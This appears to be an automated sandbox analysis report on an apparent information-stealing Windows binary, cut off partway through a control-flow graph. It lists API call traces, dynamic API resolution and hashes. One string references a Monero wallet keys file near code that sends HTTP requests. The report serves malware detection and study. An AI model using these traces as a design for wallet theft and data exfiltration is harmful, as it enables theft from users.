call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da920 call 5da8a0 call 5da800 call 5da740 call 5da920 * 2 call 5da8a0 call 5da800 * 2 call 5daad0 lstrlen call 5daad0 * 2 lstrlen call 5daad0 HttpSendRequestA 908->910 909->818 1021 5c4e32-5c4e5c InternetReadFile 910->1021 1022 5c4e5e-5c4e65 1021->1022 1023 5c4e67-5c4eb9 InternetCloseHandle call 5da800 1021->1023 1022->1023 1025 5c4e69-5c4ea7 call 5da9b0 call 5da8a0 call 5da800 1022->1025 1023->909 1025->1021
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005C4915
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C4ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,005E0DDB,00000000,?,?,00000000,?,",00000000,?,014B0D30), ref: 005C4DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005C4E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005C4E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005C4E49
                        • InternetCloseHandle.WININET(00000000), ref: 005C4EAD
                        • InternetCloseHandle.WININET(00000000), ref: 005C4EC5
                        • HttpOpenRequestA.WININET(00000000,014B0D10,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C4B15
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • InternetCloseHandle.WININET(00000000), ref: 005C4ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 4e914ddb21cb4717ce0678e58724fdaf299d067f07c50ea0712dac5c4a5ef6a8
                        • Instruction ID: b1ef069a1e1e4ff6da622f7339ba0b905a565239822a79a800f829e16738f353
                        • Opcode Fuzzy Hash: 4e914ddb21cb4717ce0678e58724fdaf299d067f07c50ea0712dac5c4a5ef6a8
                        • Instruction Fuzzy Hash: F31233729101599ADB24EB94CCA6FEFBB38BF54300F50419BB50662191EF702F49CF66
                        Function 005D7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005C11B7), ref: 005D7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 005D789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 6e01709f55bec6e0f0624f035843c27bc3ee0b987550261b9992b611f414ab73
                        • Instruction ID: 57df30037b8be5a041d44012fda814bb9b80eeb6836b93c2e70115ee4a45ac3f
                        • Opcode Fuzzy Hash: 6e01709f55bec6e0f0624f035843c27bc3ee0b987550261b9992b611f414ab73
                        • Instruction Fuzzy Hash: 4EF04FB1944208ABC714DF98DD49BAEBBB8FB08711F10466AFA05A2780C77515048BA1
                        Function 005C1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: de495fbff3fa119fb3e3085f2bd896f489936471be20b61d51bfcd7d8722e5d2
                        • Instruction ID: df6228c58510a527cb0a362178874462a6a62226cbd878fbd7594b8213903798
                        • Opcode Fuzzy Hash: de495fbff3fa119fb3e3085f2bd896f489936471be20b61d51bfcd7d8722e5d2
                        • Instruction Fuzzy Hash: FBD05E7490030CDBCB04DFE0D849ADDBB78FB08311F000558D90562341EA305481CAA6
                        Function 005D9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 5d9c10-5d9c1a 634 5da036-5da0ca LoadLibraryA * 8 633->634 635 5d9c20-5da031 GetProcAddress * 43 633->635 636 5da0cc-5da141 GetProcAddress * 5 634->636 637 5da146-5da14d 634->637 635->634 636->637 638 5da216-5da21d 637->638 639 5da153-5da211 GetProcAddress * 8 637->639 640 5da21f-5da293 GetProcAddress * 5 638->640 641 5da298-5da29f 638->641 639->638 640->641 642 5da2a5-5da332 GetProcAddress * 6 641->642 643 5da337-5da33e 641->643 642->643 644 5da41f-5da426 643->644 645 5da344-5da41a GetProcAddress * 9 643->645 646 5da428-5da49d GetProcAddress * 5 644->646 647 5da4a2-5da4a9 644->647 645->644 646->647 648 5da4dc-5da4e3 647->648 649 5da4ab-5da4d7 GetProcAddress * 2 647->649 650 5da515-5da51c 648->650 651 5da4e5-5da510 GetProcAddress * 2 648->651 649->648 652 5da612-5da619 650->652 653 5da522-5da60d GetProcAddress * 10 650->653 651->650 654 5da67d-5da684 652->654 655 5da61b-5da678 GetProcAddress * 4 652->655 653->652 656 5da69e-5da6a5 654->656 657 5da686-5da699 GetProcAddress 654->657 655->654 658 5da708-5da709 656->658 659 5da6a7-5da703 GetProcAddress * 4 656->659 657->656 659->658
                        APIs
                        • GetProcAddress.KERNEL32(76210000,01495108), ref: 005D9C2D
                        • GetProcAddress.KERNEL32(76210000,014950A8), ref: 005D9C45
                        • GetProcAddress.KERNEL32(76210000,014A8F80), ref: 005D9C5E
                        • GetProcAddress.KERNEL32(76210000,014A8CC8), ref: 005D9C76
                        • GetProcAddress.KERNEL32(76210000,014A8D28), ref: 005D9C8E
                        • GetProcAddress.KERNEL32(76210000,014AEA10), ref: 005D9CA7
                        • GetProcAddress.KERNEL32(76210000,0149A798), ref: 005D9CBF
                        • GetProcAddress.KERNEL32(76210000,014AEA28), ref: 005D9CD7
                        • GetProcAddress.KERNEL32(76210000,014AE950), ref: 005D9CF0
                        • GetProcAddress.KERNEL32(76210000,014AEA40), ref: 005D9D08
                        • GetProcAddress.KERNEL32(76210000,014AEA88), ref: 005D9D20
                        • GetProcAddress.KERNEL32(76210000,014951E8), ref: 005D9D39
                        • GetProcAddress.KERNEL32(76210000,01495208), ref: 005D9D51
                        • GetProcAddress.KERNEL32(76210000,014952E8), ref: 005D9D69
                        • GetProcAddress.KERNEL32(76210000,01494FC8), ref: 005D9D82
                        • GetProcAddress.KERNEL32(76210000,014AE8D8), ref: 005D9D9A
                        • GetProcAddress.KERNEL32(76210000,014AE938), ref: 005D9DB2
                        • GetProcAddress.KERNEL32(76210000,0149A720), ref: 005D9DCB
                        • GetProcAddress.KERNEL32(76210000,01495068), ref: 005D9DE3
                        • GetProcAddress.KERNEL32(76210000,014AE920), ref: 005D9DFB
                        • GetProcAddress.KERNEL32(76210000,014AEA58), ref: 005D9E14
                        • GetProcAddress.KERNEL32(76210000,014AE830), ref: 005D9E2C
                        • GetProcAddress.KERNEL32(76210000,014AE8A8), ref: 005D9E44
                        • GetProcAddress.KERNEL32(76210000,01495028), ref: 005D9E5D
                        • GetProcAddress.KERNEL32(76210000,014AE980), ref: 005D9E75
                        • GetProcAddress.KERNEL32(76210000,014AEAE8), ref: 005D9E8D
                        • GetProcAddress.KERNEL32(76210000,014AE860), ref: 005D9EA6
                        • GetProcAddress.KERNEL32(76210000,014AE9B0), ref: 005D9EBE
                        • GetProcAddress.KERNEL32(76210000,014AE908), ref: 005D9ED6
                        • GetProcAddress.KERNEL32(76210000,014AE968), ref: 005D9EEF
                        • GetProcAddress.KERNEL32(76210000,014AE878), ref: 005D9F07
                        • GetProcAddress.KERNEL32(76210000,014AEA70), ref: 005D9F1F
                        • GetProcAddress.KERNEL32(76210000,014AE800), ref: 005D9F38
                        • GetProcAddress.KERNEL32(76210000,0149FDA8), ref: 005D9F50
                        • GetProcAddress.KERNEL32(76210000,014AE998), ref: 005D9F68
                        • GetProcAddress.KERNEL32(76210000,014AE8C0), ref: 005D9F81
                        • GetProcAddress.KERNEL32(76210000,01495248), ref: 005D9F99
                        • GetProcAddress.KERNEL32(76210000,014AE848), ref: 005D9FB1
                        • GetProcAddress.KERNEL32(76210000,014950C8), ref: 005D9FCA
                        • GetProcAddress.KERNEL32(76210000,014AEAA0), ref: 005D9FE2
                        • GetProcAddress.KERNEL32(76210000,014AE890), ref: 005D9FFA
                        • GetProcAddress.KERNEL32(76210000,01495288), ref: 005DA013
                        • GetProcAddress.KERNEL32(76210000,01494FE8), ref: 005DA02B
                        • LoadLibraryA.KERNEL32(014AE818,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA03D
                        • LoadLibraryA.KERNEL32(014AE8F0,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA04E
                        • LoadLibraryA.KERNEL32(014AEAB8,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA060
                        • LoadLibraryA.KERNEL32(014AEAD0,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA072
                        • LoadLibraryA.KERNEL32(014AE9C8,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA083
                        • LoadLibraryA.KERNEL32(014AE9E0,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA095
                        • LoadLibraryA.KERNEL32(014AE9F8,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA0A7
                        • LoadLibraryA.KERNEL32(014AED28,?,005D5CA3,005E0AEB,?,?,?,?,?,?,?,?,?,?,005E0AEA,005E0AE3), ref: 005DA0B8
                        • GetProcAddress.KERNEL32(751E0000,01495008), ref: 005DA0DA
                        • GetProcAddress.KERNEL32(751E0000,014AEB18), ref: 005DA0F2
                        • GetProcAddress.KERNEL32(751E0000,014A8B78), ref: 005DA10A
                        • GetProcAddress.KERNEL32(751E0000,014AECB0), ref: 005DA123
                        • GetProcAddress.KERNEL32(751E0000,01495048), ref: 005DA13B
                        • GetProcAddress.KERNEL32(73FB0000,0149A4C8), ref: 005DA160
                        • GetProcAddress.KERNEL32(73FB0000,01495628), ref: 005DA179
                        • GetProcAddress.KERNEL32(73FB0000,0149A680), ref: 005DA191
                        • GetProcAddress.KERNEL32(73FB0000,014AEC08), ref: 005DA1A9
                        • GetProcAddress.KERNEL32(73FB0000,014AED10), ref: 005DA1C2
                        • GetProcAddress.KERNEL32(73FB0000,014954A8), ref: 005DA1DA
                        • GetProcAddress.KERNEL32(73FB0000,014953C8), ref: 005DA1F2
                        • GetProcAddress.KERNEL32(73FB0000,014AED40), ref: 005DA20B
                        • GetProcAddress.KERNEL32(753A0000,01495488), ref: 005DA22C
                        • GetProcAddress.KERNEL32(753A0000,014954C8), ref: 005DA244
                        • GetProcAddress.KERNEL32(753A0000,014AED58), ref: 005DA25D
                        • GetProcAddress.KERNEL32(753A0000,014AEBD8), ref: 005DA275
                        • GetProcAddress.KERNEL32(753A0000,01495448), ref: 005DA28D
                        • GetProcAddress.KERNEL32(76310000,0149A608), ref: 005DA2B3
                        • GetProcAddress.KERNEL32(76310000,0149A568), ref: 005DA2CB
                        • GetProcAddress.KERNEL32(76310000,014AEB60), ref: 005DA2E3
                        • GetProcAddress.KERNEL32(76310000,01495408), ref: 005DA2FC
                        • GetProcAddress.KERNEL32(76310000,01495528), ref: 005DA314
                        • GetProcAddress.KERNEL32(76310000,0149A8B0), ref: 005DA32C
                        • GetProcAddress.KERNEL32(76910000,014AEB78), ref: 005DA352
                        • GetProcAddress.KERNEL32(76910000,01495548), ref: 005DA36A
                        • GetProcAddress.KERNEL32(76910000,014A8AC8), ref: 005DA382
                        • GetProcAddress.KERNEL32(76910000,014AEBA8), ref: 005DA39B
                        • GetProcAddress.KERNEL32(76910000,014AED70), ref: 005DA3B3
                        • GetProcAddress.KERNEL32(76910000,01495348), ref: 005DA3CB
                        • GetProcAddress.KERNEL32(76910000,01495368), ref: 005DA3E4
                        • GetProcAddress.KERNEL32(76910000,014AEBF0), ref: 005DA3FC
                        • GetProcAddress.KERNEL32(76910000,014AED88), ref: 005DA414
                        • GetProcAddress.KERNEL32(75B30000,01495668), ref: 005DA436
                        • GetProcAddress.KERNEL32(75B30000,014AEB90), ref: 005DA44E
                        • GetProcAddress.KERNEL32(75B30000,014AEDA0), ref: 005DA466
                        • GetProcAddress.KERNEL32(75B30000,014AECC8), ref: 005DA47F
                        • GetProcAddress.KERNEL32(75B30000,014AEC20), ref: 005DA497
                        • GetProcAddress.KERNEL32(75670000,01495568), ref: 005DA4B8
                        • GetProcAddress.KERNEL32(75670000,01495648), ref: 005DA4D1
                        • GetProcAddress.KERNEL32(76AC0000,01495588), ref: 005DA4F2
                        • GetProcAddress.KERNEL32(76AC0000,014AEC98), ref: 005DA50A
                        • GetProcAddress.KERNEL32(6F4E0000,014955E8), ref: 005DA530
                        • GetProcAddress.KERNEL32(6F4E0000,014955A8), ref: 005DA548
                        • GetProcAddress.KERNEL32(6F4E0000,014956E8), ref: 005DA560
                        • GetProcAddress.KERNEL32(6F4E0000,014AEDB8), ref: 005DA579
                        • GetProcAddress.KERNEL32(6F4E0000,01495608), ref: 005DA591
                        • GetProcAddress.KERNEL32(6F4E0000,01495688), ref: 005DA5A9
                        • GetProcAddress.KERNEL32(6F4E0000,014955C8), ref: 005DA5C2
                        • GetProcAddress.KERNEL32(6F4E0000,014956A8), ref: 005DA5DA
                        • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 005DA5F1
                        • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 005DA607
                        • GetProcAddress.KERNEL32(75AE0000,014AEC50), ref: 005DA629
                        • GetProcAddress.KERNEL32(75AE0000,014A8C68), ref: 005DA641
                        • GetProcAddress.KERNEL32(75AE0000,014AEDD0), ref: 005DA659
                        • GetProcAddress.KERNEL32(75AE0000,014AEC38), ref: 005DA672
                        • GetProcAddress.KERNEL32(76300000,014953E8), ref: 005DA693
                        • GetProcAddress.KERNEL32(6FE30000,014AEB48), ref: 005DA6B4
                        • GetProcAddress.KERNEL32(6FE30000,01495388), ref: 005DA6CD
                        • GetProcAddress.KERNEL32(6FE30000,014AEBC0), ref: 005DA6E5
                        • GetProcAddress.KERNEL32(6FE30000,014AEC68), ref: 005DA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 60ac59c1a6e269a9eb63dd5fbf90823dba02027145233ef13323617637521769
                        • Instruction ID: f20ce685e91f5b58a075e862ce63b30a5968ca166ad7c11c6e0948840e25e134
                        • Opcode Fuzzy Hash: 60ac59c1a6e269a9eb63dd5fbf90823dba02027145233ef13323617637521769
                        • Instruction Fuzzy Hash: F4620BB6610300AFD3DCDFA8ED889663BF9F78D701714C52AA649C3264D73A9841DF62
                        Function 005C6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 5c6280-5c630b call 5da7a0 call 5c47b0 call 5da740 InternetOpenA StrCmpCA 1040 5c630d 1033->1040 1041 5c6314-5c6318 1033->1041 1040->1041 1042 5c631e-5c6342 InternetConnectA 1041->1042 1043 5c6509-5c6525 call 5da7a0 call 5da800 * 2 1041->1043 1044 5c64ff-5c6503 InternetCloseHandle 1042->1044 1045 5c6348-5c634c 1042->1045 1061 5c6528-5c652d 1043->1061 1044->1043 1047 5c634e-5c6358 1045->1047 1048 5c635a 1045->1048 1050 5c6364-5c6392 HttpOpenRequestA 1047->1050 1048->1050 1052 5c6398-5c639c 1050->1052 1053 5c64f5-5c64f9 InternetCloseHandle 1050->1053 1056 5c639e-5c63bf InternetSetOptionA 1052->1056 1057 5c63c5-5c6405 HttpSendRequestA HttpQueryInfoA 1052->1057 1053->1044 1056->1057 1059 5c642c-5c644b call 5d8940 1057->1059 1060 5c6407-5c6427 call 5da740 call 5da800 * 2 1057->1060 1066 5c644d-5c6454 1059->1066 1067 5c64c9-5c64e9 call 5da740 call 5da800 * 2 1059->1067 1060->1061 1070 5c6456-5c6480 InternetReadFile 1066->1070 1071 5c64c7-5c64ef InternetCloseHandle 1066->1071 1067->1061 1076 5c648b 1070->1076 1077 5c6482-5c6489 1070->1077 1071->1053 1076->1071 1077->1076 1080 5c648d-5c64c5 call 5da9b0 call 5da8a0 call 5da800 1077->1080 1080->1070
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • InternetOpenA.WININET(005E0DFE,00000001,00000000,00000000,00000000), ref: 005C62E1
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C6335
                        • HttpOpenRequestA.WININET(00000000,GET,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C6385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005C63BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005C63D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005C63FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005C646D
                        • InternetCloseHandle.WININET(00000000), ref: 005C64EF
                        • InternetCloseHandle.WININET(00000000), ref: 005C64F9
                        • InternetCloseHandle.WININET(00000000), ref: 005C6503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 1124b6eb7ecffb9013d2ea809bfea568fc08e3880b7b75310fc2de1b79ebd82d
                        • Instruction ID: cb9a86c9b17cefc985a7f17052626c6e7ecc67202cf922c2d91a8ad90ebba86a
                        • Opcode Fuzzy Hash: 1124b6eb7ecffb9013d2ea809bfea568fc08e3880b7b75310fc2de1b79ebd82d
                        • Instruction Fuzzy Hash: CB712C71A00258AFDB28DBE4CC99FEE7B74BB44700F108559F50A6B290DBB46A85CF51
                        Function 005D5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 5d5510-5d5577 call 5d5ad0 call 5da820 * 3 call 5da740 * 4 1106 5d557c-5d5583 1090->1106 1107 5d5585-5d55b6 call 5da820 call 5da7a0 call 5c1590 call 5d51f0 1106->1107 1108 5d55d7-5d564c call 5da740 * 2 call 5c1590 call 5d52c0 call 5da8a0 call 5da800 call 5daad0 StrCmpCA 1106->1108 1124 5d55bb-5d55d2 call 5da8a0 call 5da800 1107->1124 1133 5d5693-5d56a9 call 5daad0 StrCmpCA 1108->1133 1138 5d564e-5d568e call 5da7a0 call 5c1590 call 5d51f0 call 5da8a0 call 5da800 1108->1138 1124->1133 1140 5d57dc-5d5844 call 5da8a0 call 5da820 * 2 call 5c1670 call 5da800 * 4 call 5d6560 call 5c1550 1133->1140 1141 5d56af-5d56b6 1133->1141 1138->1133 1270 5d5ac3-5d5ac6 1140->1270 1144 5d56bc-5d56c3 1141->1144 1145 5d57da-5d585f call 5daad0 StrCmpCA 1141->1145 1149 5d571e-5d5793 call 5da740 * 2 call 5c1590 call 5d52c0 call 5da8a0 call 5da800 call 5daad0 StrCmpCA 1144->1149 1150 5d56c5-5d5719 call 5da820 call 5da7a0 call 5c1590 call 5d51f0 call 5da8a0 call 5da800 1144->1150 1164 5d5865-5d586c 1145->1164 1165 5d5991-5d59f9 call 5da8a0 call 5da820 * 2 call 5c1670 call 5da800 * 4 call 5d6560 call 5c1550 1145->1165 1149->1145 1250 